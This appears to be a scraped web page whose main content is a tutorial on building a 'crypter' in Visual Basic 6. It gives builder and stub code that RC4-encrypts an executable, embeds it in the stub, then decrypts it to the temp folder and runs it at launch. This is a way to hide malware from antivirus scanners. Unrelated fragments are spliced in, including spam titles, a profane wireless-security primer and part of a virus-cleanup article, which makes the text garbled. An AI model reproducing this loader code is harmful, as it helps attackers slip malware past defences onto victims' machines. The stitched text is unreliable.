How To Make a crypter? What you will need: Visual Basic 6 or Visual Basic 6 Portable A RC4 module A brain The RC4 module and Visual Basic 6 Portable will have the download links at the end of this tutorial. TABLE OF CONTENTS: 1.

Introduction 2. Building your crypter 3. Conclusion 1. Introduction RC4: In cryptography, RC4 (also known as ARCFOUR or ARC4 meaning Alleged RC4, see below) is the most widely used stream cipher and is used in protocols such as Secure Sockets Layer (SSL) (to protect Internet traffic) and WEP (to secure wireless networks). Stub: A method stub or simply stub in software development is a piece of code used to stand in for some other programming functionality. A stub may simulate the behavior of existing code (such as a procedure on a remote machine) or be a temporary substitute for yet-to-be-developed code. Stubs are therefore most useful in porting, distributed computing as well as general software development and testing.

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Builder: A builder is usually the client to make/do something to a file, and it is supposed to go with a stub. The builder usually allows the stub to simulate the behaivor of existing code, and than it makes the file/does something to a file. Building your crypter. Now, open up Visual Basic 6 or Visual Basic Portable.

To make the task easier, open two Visual Basic 6 programs. One is going to be the builder, and one is going to be the stub. Tacx Trainer Crackberry. Now, lets start on the builder. Add a RC4 module, and lets go on.

First of all, add one label that says “File Path:”, a text box right beside “File Path:”, a button that says “Browse” or “”, and another button that says “Crypt” or “Build”. Now, lets add the CommonDialog control. Add a CommonDialog and name it commondlg. Now, lets double click the button that says “Browse” or “”. Add this code, and I’ll explain it. With commondlg 'CommonDialog1..Filter = 'Executable files *.exe' 'The file used for crypting.

(*.exe).DialogTitle = 'Please select a executable file.' 'The title of the dialog..ShowOpen 'Show the dialog. End With TextBox1.Text = commondlg.FileName 'Make TextBox1.Text as the selected filename. The With commondlg command calls CommonDialog1.

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The.Filter part allows you to choose what files you only want to be selected. The.DialogTitle command is the title of the dialog (the prompt that tells you which file you want to select for crypting). The.ShowOpen command shows the dialog. End With will end CommonDialog1. And finally, the TextBox1.Text = commondlg.FileName command makes TextBox1.text show the selected filename. Now, click the button that says “Build” or “Crypt”.

Bsnl Wimax Hacking Tricks Tutorial For Beginning

Add this code. It explains it, so please take time to read what it says. Dim sStub As String, sFile As String 'This command will declare the two strings. Open App.Path & ' stub.exe' For Binary As #1 'Opens up the stub. SStub = Space(LOF(1)) 'This declares the space. Get #1,, sStub 'This puts in a space in the file.

Close #1 'This closes the file. Open TextBox1.Text For Binary As #1 'Opens up the stub.

SFile = Space(LOF(1)) 'This declares the space. Get #1,, sFile 'This puts a space in the file. Close #1 'This closes the file. Open App.Path & ' output.exe' For Binary As #1 'This creates the crypted file as 'output.exe'.

Put #1,, sStub & FileSplit & RC4(sFile, Pass) 'This adds the option FileSplit and the RC4 option. Close #1 'This closes the file. MsgBox ('File crypted successfully!' ) 'This is the prompt to show the message that the program successfully crypted the file. Now, you might have an error that will show you that FileSplit and Pass is not declared.

To do so, we will add the declarations on the top of the coding. Const FileSplit = ' 'The file split.

Const Pass = 's0rasRC4Tutorial' 'The RC4 password; It must be the same as the one on the builder! Public Declare Function ShellExecute Lib 'Shell32.dll' Alias 'ShellExecuteA' (ByVal hwnd As Long, ByVal lpszOp As String, ByVal lpszFile As String, ByVal lpszParams As String, ByVal LpszDir As String, ByVal FsShowCmd As Long) As Long 'Calls the ShellExecute command. Public Sub Main() 'The main part of the stub. Dim sStub As String, sFile As String 'This will declare the strings again, just like we did on the builder. Open App.Path & ' ' & App.EXEName & '.exe' For Binary As #1 'Opens up the selected.exe file.

SStub = Space(LOF(1)) 'This will declare the space. Get #1,, sStub 'This puts a space in the file. Close #1 'This closes the file. SFile = Split(sStub, FileSplit)(1) 'This will split the file and the stub. Open Environ('tmp') & ' decrypted.exe' For Binary As #1 'This will make a decrypted file in the RC4 folder. Put #1,, RC4(sFile, Pass) 'This will add the RC4 password to the file with the selected RC4 password.

Call ShellExecute(0, vbNullString, Environ('tmp') & ' decrypted.exe', vbNullString, vbNullString, 1) 'Calls the ShellExecute command and drops the decrypted file in the temporary files folder. End Sub 'This ends 'Public Sub Main()'. The code will be teaching you. Once you’re done, remove the Form1. Conclusion I hope you liked this tutorial, and I hope you learned a lot about crypting with RC4! Visual Basic 6 Portable: RC4 module. Before to Drive a Truck, Lets learn how to drive, and Wats in it.!!

Here are the few Terminologies, You shud know About Wireless networked systems.!! If u don understand this underlyin concepts, it lll be a hard time for u to guarding yo Wireless network.  SSID: (Service Set Identifier) If u having a wireless router or modem or any shits.the Hardware must have SSID(Like Namin a New born Baby, Yo can name ur Router How it wann be called ba others,But If u take any BSNL Connection Wi fi ASDL Modem Comes With SSID name May be second name of yo father), Router has a. Device Burned With MAC &SSID Found in the Picture(WANADOO-02DB) functionality that it can broadcast or stealth broadcast Which means if u scan for wireless networks u often find networks in Broadcast mode (I.e Tikona 1800 204 3333)Like thatIn stealth Broadcast we cant identify the wireless network. MODEM Don have this fuckin option, so that’s y weneva u scan any, u find some home networks modem range.but u can proceed only after Given SSID in the prompt box.!!  WEP: (Wired Equivalence privacy) this Protocol givea Base level security for all wi fi vendors and system Can benefit from OSI Standardization effort.Tha fat ass option is one can Set in “ON” Or “OFF”To use thisBut Mostly all jerks n Geeks Forcibly set this “ON”  WPA: (Wi Fi Protected Access) A security protocol tat was designed to secure Wireless Technology and To overcome the WEP Limitations.!! Hello guys, as we all know nowadays virus attacks are very common and we have to have lot of problems because of viruses like task manager does not opens,folder options missing, registry has been disabled by administrator,cannot find dll and so on.

These are very common problems and can happen with any of us so we must know to fix these problems without formatting your windows XP. Most of the virus infects your basic programs i.e task manager,registry,group policy editor,boot up,folder properties etc. Today i will tell how to Fix windows Xp after virus attack in this article.

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